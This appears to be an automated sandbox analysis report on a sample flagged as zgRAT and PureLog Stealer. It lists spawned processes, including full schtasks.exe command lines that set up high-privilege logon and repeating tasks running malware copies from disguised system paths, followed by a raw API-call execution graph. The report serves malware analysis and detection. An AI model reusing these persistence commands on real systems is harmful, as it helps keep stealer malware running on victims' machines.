                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:13
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:14
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 14 /tr "'C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:15
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:16
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:17
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 7 /tr "'C:\Windows\SchCache\RuntimeBroker.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:18
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:19
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:20
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 13 /tr "'C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:21
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 7 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:22
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOw" /sc ONLOGON /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:23
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "SfLAFHFXIbHzHGgilQgXtKOwS" /sc MINUTE /mo 6 /tr "'C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:24
                                                          Start time:23:42:16
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:26
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitor" /sc ONLOGON /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:27
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\schtasks.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 7 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /rl HIGHEST /f
                                                          Imagebase:0x7ff76f990000
                                                          File size:235'008 bytes
                                                          MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:29
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Imagebase:0x360000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 83%, ReversingLabs
                                                          Has exited:true

                                                          Target ID:30
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat"
                                                          Imagebase:0x7ff6aa700000
                                                          File size:289'792 bytes
                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:31
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7699e0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:32
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Imagebase:0x8f0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:33
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\chcp.com
                                                          Wow64 process (32bit):false
                                                          Commandline:chcp 65001
                                                          Imagebase:0x7ff7c4ae0000
                                                          File size:14'848 bytes
                                                          MD5 hash:33395C4732A49065EA72590B14B64F32
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:34
                                                          Start time:23:42:17
                                                          Start date:09/01/2025
                                                          Path:C:\Windows\System32\w32tm.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                          Imagebase:0x7ff7c55f0000
                                                          File size:108'032 bytes
                                                          MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:35
                                                          Start time:23:42:19
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Imagebase:0x8c0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:36
                                                          Start time:23:42:19
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Imagebase:0x430000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:38
                                                          Start time:23:42:22
                                                          Start date:09/01/2025
                                                          Path:C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0xdc0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, Author: Joe Security
                                                          Antivirus matches:
                                                          • Detection: 100%, Avira
                                                          • Detection: 100%, Joe Sandbox ML
                                                          • Detection: 83%, ReversingLabs
                                                          • Detection: 60%, Virustotal, Browse
                                                          Has exited:true

                                                          Target ID:41
                                                          Start time:23:42:27
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0xe80000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:43
                                                          Start time:23:42:44
                                                          Start date:09/01/2025
                                                          Path:C:\ChainBroker\bridgeServerFontSavesMonitor.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                                          Imagebase:0xb0000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                          Target ID:44
                                                          Start time:23:42:52
                                                          Start date:09/01/2025
                                                          Path:C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                                          Imagebase:0x10000
                                                          File size:14'385'664 bytes
                                                          MD5 hash:39953ACD4FD32884E6CAD0D1E4688051
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:9.6%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:9.3%
                                                            Total number of Nodes:1515
                                                            Total number of Limit Nodes:43
24574->24575 24576 bebf15 24575->24576 24577 bed6b5 GetWindow 24575->24577 24576->24353 24576->24354 24577->24576 24578 bed6d5 24577->24578 24578->24576 24579 bed6e2 GetClassNameW 24578->24579 24581 bed76a GetWindow 24578->24581 24582 bed706 GetWindowLongW 24578->24582 25197 be1fbb CompareStringW 24579->25197 24581->24576 24581->24578 24582->24581 24583 bed716 SendMessageW 24582->24583 24583->24581 24584 bed72c GetObjectW 24583->24584 25198 bea605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24584->25198 24586 bed743 25199 bea5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24586->25199 25200 bea80c 8 API calls 24586->25200 24589 bed754 SendMessageW DeleteObject 24589->24581 24590->24364 24592 beabcc 24591->24592 24593 beabf1 24591->24593 25201 be1fbb CompareStringW 24592->25201 24594 beabff 24593->24594 24595 beabf6 SHAutoComplete 24593->24595 24599 beb093 24594->24599 24595->24594 24597 beabdf 24597->24593 24598 beabe3 FindWindowExW 24597->24598 24598->24593 24600 beb09d __EH_prolog 24599->24600 24601 bd13dc 84 API calls 24600->24601 24602 beb0bf 24601->24602 25202 bd1fdc 24602->25202 24605 beb0eb 24608 bd19af 128 API calls 24605->24608 24606 beb0d9 24607 bd1692 86 API calls 24606->24607 24609 beb0e4 24607->24609 24611 beb10d __InternalCxxFrameHandler ___std_exception_copy 24608->24611 24609->24394 24609->24396 24610 bd1692 86 API calls 24610->24609 24611->24610 24612->24374 25210 beb568 PeekMessageW 24613->25210 24616 bed536 SendMessageW SendMessageW 24618 bed572 24616->24618 24619 bed591 SendMessageW SendMessageW SendMessageW 24616->24619 24617 bed502 24620 bed50d ShowWindow SendMessageW SendMessageW 24617->24620 24618->24619 24621 bed5e7 SendMessageW 24619->24621 24622 bed5c4 SendMessageW 24619->24622 24620->24616 24621->24397 24622->24621 24623->24455 24624->24480 24625->24487 24626->24492 24627->24498 24628->24505 24629->24433 24630->24454 24631->24429 24632->24423 24633->24513 24634->24511 24636 bda2bf 24635->24636 24637 bda2e3 24636->24637 24638 bda2d6 
CreateDirectoryW 24636->24638 24656 bda231 24637->24656 24638->24637 24640 bda316 24638->24640 24644 bda325 24640->24644 24648 bda4ed 24640->24648 24642 bda329 GetLastError 24642->24644 24644->24520 24645 bdbb03 GetCurrentDirectoryW 24646 bda2ff 24645->24646 24646->24642 24647 bda303 CreateDirectoryW 24646->24647 24647->24640 24647->24642 24649 beec50 24648->24649 24650 bda4fa SetFileAttributesW 24649->24650 24651 bda53d 24650->24651 24652 bda510 24650->24652 24651->24644 24653 bdbb03 GetCurrentDirectoryW 24652->24653 24654 bda524 24653->24654 24654->24651 24655 bda528 SetFileAttributesW 24654->24655 24655->24651 24659 bda243 24656->24659 24660 beec50 24659->24660 24661 bda250 GetFileAttributesW 24660->24661 24662 bda23a 24661->24662 24663 bda261 24661->24663 24662->24642 24662->24645 24664 bdbb03 GetCurrentDirectoryW 24663->24664 24665 bda275 24664->24665 24665->24662 24666 bda279 GetFileAttributesW 24665->24666 24666->24662 24668 beb31e 24667->24668 24669 beb3f0 ExpandEnvironmentStringsW 24668->24669 24670 beb40d 24668->24670 24669->24670 24670->24545 24671->24545 24672->24545 24673->24559 24674->24545 24675->24545 24676->24545 24678 bf8e54 24677->24678 24679 bf8e6c 24678->24679 24680 bf8e61 24678->24680 24682 bf8e74 24679->24682 24688 bf8e7d _abort 24679->24688 24681 bf8e06 __vsnwprintf_l 21 API calls 24680->24681 24687 bf8e69 24681->24687 24685 bf8dcc _free 20 API calls 24682->24685 24683 bf8ea7 HeapReAlloc 24683->24687 24683->24688 24684 bf8e82 24690 bf91a8 20 API calls _abort 24684->24690 24685->24687 24687->24545 24688->24683 24688->24684 24691 bf7a5e 7 API calls 2 library calls 24688->24691 24690->24687 24691->24688 24693 be0666 _wcslen 24692->24693 24720 bd17e9 24693->24720 24695 be067e 24695->24563 24697 be0659 _wcslen 24696->24697 24698 bd17e9 78 API calls 24697->24698 24699 be067e 24698->24699 24699->24565 24701 bd7b17 __EH_prolog 24700->24701 24737 bdce40 24701->24737 24703 bd7b32 24704 beeb38 8 API calls 24703->24704 24705 bd7b5c 24704->24705 24743 
be4a76 24705->24743 24708 bd7c7d 24709 bd7c87 24708->24709 24711 bd7cf1 24709->24711 24772 bda56d 24709->24772 24714 bd7d50 24711->24714 24750 bd8284 24711->24750 24712 bd7d92 24712->24569 24714->24712 24778 bd138b 74 API calls 24714->24778 24717 bd7bac 24716->24717 24719 bd7bb3 24716->24719 24718 be2297 86 API calls 24717->24718 24718->24719 24721 bd17ff 24720->24721 24732 bd185a __InternalCxxFrameHandler 24720->24732 24722 bd1828 24721->24722 24733 bd6c36 76 API calls __vswprintf_c_l 24721->24733 24723 bd1887 24722->24723 24729 bd1847 ___std_exception_copy 24722->24729 24725 bf3e3e 22 API calls 24723->24725 24728 bd188e 24725->24728 24726 bd181e 24734 bd6ca7 75 API calls 24726->24734 24728->24732 24736 bd6ca7 75 API calls 24728->24736 24729->24732 24735 bd6ca7 75 API calls 24729->24735 24732->24695 24733->24726 24734->24722 24735->24732 24736->24732 24738 bdce4a __EH_prolog 24737->24738 24739 beeb38 8 API calls 24738->24739 24741 bdce8d 24739->24741 24740 beeb38 8 API calls 24742 bdceb1 24740->24742 24741->24740 24742->24703 24744 be4a80 __EH_prolog 24743->24744 24745 beeb38 8 API calls 24744->24745 24746 be4a9c 24745->24746 24747 bd7b8b 24746->24747 24749 be0e46 80 API calls 24746->24749 24747->24708 24749->24747 24751 bd828e __EH_prolog 24750->24751 24779 bd13dc 24751->24779 24753 bd82aa 24754 bd82bb 24753->24754 24922 bd9f42 24753->24922 24757 bd82f2 24754->24757 24787 bd1a04 24754->24787 24918 bd1692 24757->24918 24760 bd8389 24806 bd8430 24760->24806 24764 bd83e8 24814 bd1f6d 24764->24814 24767 bd83f3 24767->24757 24818 bd3b2d 24767->24818 24830 bd848e 24767->24830 24769 bda56d 7 API calls 24770 bd82ee 24769->24770 24770->24757 24770->24760 24770->24769 24926 bdc0c5 CompareStringW _wcslen 24770->24926 24773 bda582 24772->24773 24774 bda5b0 24773->24774 25186 bda69b 24773->25186 24774->24709 24776 bda592 24776->24774 24777 bda597 FindClose 24776->24777 24777->24774 24778->24712 24780 bd13e1 __EH_prolog 24779->24780 24781 bdce40 8 API calls 24780->24781 24782 
bd1419 24781->24782 24783 beeb38 8 API calls 24782->24783 24786 bd1474 _abort 24782->24786 24784 bd1461 24783->24784 24784->24786 24927 bdb505 24784->24927 24786->24753 24788 bd1a0e __EH_prolog 24787->24788 24800 bd1a61 24788->24800 24803 bd1b9b 24788->24803 24943 bd13ba 24788->24943 24790 bd1bc7 24946 bd138b 74 API calls 24790->24946 24793 bd1bd4 24794 bd3b2d 101 API calls 24793->24794 24793->24803 24799 bd1c12 24794->24799 24795 bd1c5a 24798 bd1c8d 24795->24798 24795->24803 24947 bd138b 74 API calls 24795->24947 24797 bd3b2d 101 API calls 24797->24799 24798->24803 24805 bd9e80 79 API calls 24798->24805 24799->24795 24799->24797 24800->24790 24800->24793 24800->24803 24801 bd3b2d 101 API calls 24802 bd1cde 24801->24802 24802->24801 24802->24803 24803->24770 24804 bd9e80 79 API calls 24804->24800 24805->24802 24965 bdcf3d 24806->24965 24808 bd8440 24969 be13d2 GetSystemTime SystemTimeToFileTime 24808->24969 24810 bd83a3 24810->24764 24811 be1b66 24810->24811 24970 bede6b 24811->24970 24815 bd1f72 __EH_prolog 24814->24815 24817 bd1fa6 24815->24817 24978 bd19af 24815->24978 24817->24767 24819 bd3b3d 24818->24819 24820 bd3b39 24818->24820 24829 bd9e80 79 API calls 24819->24829 24820->24767 24821 bd3b4f 24822 bd3b78 24821->24822 24824 bd3b6a 24821->24824 25109 bd286b 101 API calls 3 library calls 24822->25109 24823 bd3baa 24823->24767 24824->24823 25108 bd32f7 89 API calls 2 library calls 24824->25108 24827 bd3b76 24827->24823 25110 bd20d7 74 API calls 24827->25110 24829->24821 24831 bd8498 __EH_prolog 24830->24831 24836 bd84d5 24831->24836 24849 bd8513 24831->24849 25135 be8c8d 103 API calls 24831->25135 24832 bd84f5 24834 bd851c 24832->24834 24835 bd84fa 24832->24835 24834->24849 25137 be8c8d 103 API calls 24834->25137 24835->24849 25136 bd7a0d 152 API calls 24835->25136 24836->24832 24838 bd857a 24836->24838 24836->24849 24838->24849 25111 bd5d1a 24838->25111 24841 bd8605 24841->24849 25117 bd8167 24841->25117 24844 bd8797 24845 bda56d 7 API calls 24844->24845 24846 
bd8802 24844->24846 24845->24846 25123 bd7c0d 24846->25123 24848 bdd051 82 API calls 24855 bd885d 24848->24855 24849->24767 24850 bd898b 25140 bd2021 74 API calls 24850->25140 24851 bd8992 24852 bd8a5f 24851->24852 24859 bd89e1 24851->24859 24856 bd8ab6 24852->24856 24871 bd8a6a 24852->24871 24855->24848 24855->24849 24855->24850 24855->24851 25138 bd8117 84 API calls 24855->25138 25139 bd2021 74 API calls 24855->25139 24863 bd8a4c 24856->24863 25143 bd7fc0 97 API calls 24856->25143 24857 bd8b14 24860 bd9105 24857->24860 24878 bd8b82 24857->24878 25144 bd98bc 24857->25144 24858 bd8ab4 24864 bd959a 80 API calls 24858->24864 24859->24857 24859->24863 24865 bda231 3 API calls 24859->24865 24862 bd959a 80 API calls 24860->24862 24862->24849 24863->24857 24863->24858 24864->24849 24866 bd8a19 24865->24866 24866->24863 25141 bd92a3 97 API calls 24866->25141 24867 bdab1a 8 API calls 24869 bd8bd1 24867->24869 24872 bdab1a 8 API calls 24869->24872 24871->24858 25142 bd7db2 101 API calls 24871->25142 24889 bd8be7 24872->24889 24876 bd8b70 25148 bd6e98 77 API calls 24876->25148 24878->24867 24879 bd8d18 24882 bd8d8a 24879->24882 24883 bd8d28 24879->24883 24880 bd8e40 24884 bd8e66 24880->24884 24885 bd8e52 24880->24885 24904 bd8d49 24880->24904 24881 bd8cbc 24881->24879 24881->24880 24890 bd8167 19 API calls 24882->24890 24886 bd8d6e 24883->24886 24895 bd8d37 24883->24895 24888 be3377 75 API calls 24884->24888 24887 bd9215 123 API calls 24885->24887 24886->24904 25151 bd77b8 111 API calls 24886->25151 24887->24904 24891 bd8e7f 24888->24891 24889->24881 24892 bd8c93 24889->24892 24898 bd981a 79 API calls 24889->24898 24894 bd8dbd 24890->24894 25154 be3020 123 API calls 24891->25154 24892->24881 25149 bd9a3c 82 API calls 24892->25149 24900 bd8df5 24894->24900 24901 bd8de6 24894->24901 24894->24904 25150 bd2021 74 API calls 24895->25150 24898->24892 25153 bd9155 93 API calls __EH_prolog 24900->25153 25152 bd7542 85 API calls 24901->25152 24909 bd8f85 24904->24909 25155 bd2021 74 
API calls 24904->25155 24906 bd9090 24906->24860 24907 bda4ed 3 API calls 24906->24907 24910 bd90eb 24907->24910 24908 bd903e 25130 bd9da2 24908->25130 24909->24860 24909->24906 24909->24908 25129 bd9f09 SetEndOfFile 24909->25129 24910->24860 25156 bd2021 74 API calls 24910->25156 24913 bd9085 24915 bd9620 77 API calls 24913->24915 24915->24906 24916 bd90fb 25157 bd6dcb 76 API calls 24916->25157 24919 bd16a4 24918->24919 25173 bdcee1 24919->25173 24923 bd9f59 24922->24923 24924 bd9f63 24923->24924 25185 bd6d0c 78 API calls 24923->25185 24924->24754 24926->24770 24928 bdb50f __EH_prolog 24927->24928 24933 bdf1d0 82 API calls 24928->24933 24930 bdb521 24934 bdb61e 24930->24934 24933->24930 24935 bdb630 _abort 24934->24935 24938 be10dc 24935->24938 24941 be109e GetCurrentProcess GetProcessAffinityMask 24938->24941 24942 bdb597 24941->24942 24942->24786 24948 bd1732 24943->24948 24945 bd13d6 24945->24804 24946->24803 24947->24798 24949 bd1748 24948->24949 24960 bd17a0 __InternalCxxFrameHandler 24948->24960 24950 bd1771 24949->24950 24961 bd6c36 76 API calls __vswprintf_c_l 24949->24961 24952 bd17c7 24950->24952 24955 bd178d ___std_exception_copy 24950->24955 24954 bf3e3e 22 API calls 24952->24954 24953 bd1767 24962 bd6ca7 75 API calls 24953->24962 24957 bd17ce 24954->24957 24955->24960 24963 bd6ca7 75 API calls 24955->24963 24957->24960 24964 bd6ca7 75 API calls 24957->24964 24960->24945 24961->24953 24962->24950 24963->24960 24964->24960 24966 bdcf4d 24965->24966 24967 bdcf54 24965->24967 24968 bd981a 79 API calls 24966->24968 24967->24808 24968->24967 24969->24810 24971 bede78 24970->24971 24972 bde617 53 API calls 24971->24972 24973 bede9b 24972->24973 24974 bd4092 _swprintf 51 API calls 24973->24974 24975 bedead 24974->24975 24976 bed4d4 16 API calls 24975->24976 24977 be1b7c 24976->24977 24977->24764 24979 bd19bf 24978->24979 24980 bd19bb 24978->24980 24982 bd18f6 24979->24982 24980->24817 24983 bd1908 24982->24983 24984 bd1945 24982->24984 24985 bd3b2d 101 API 
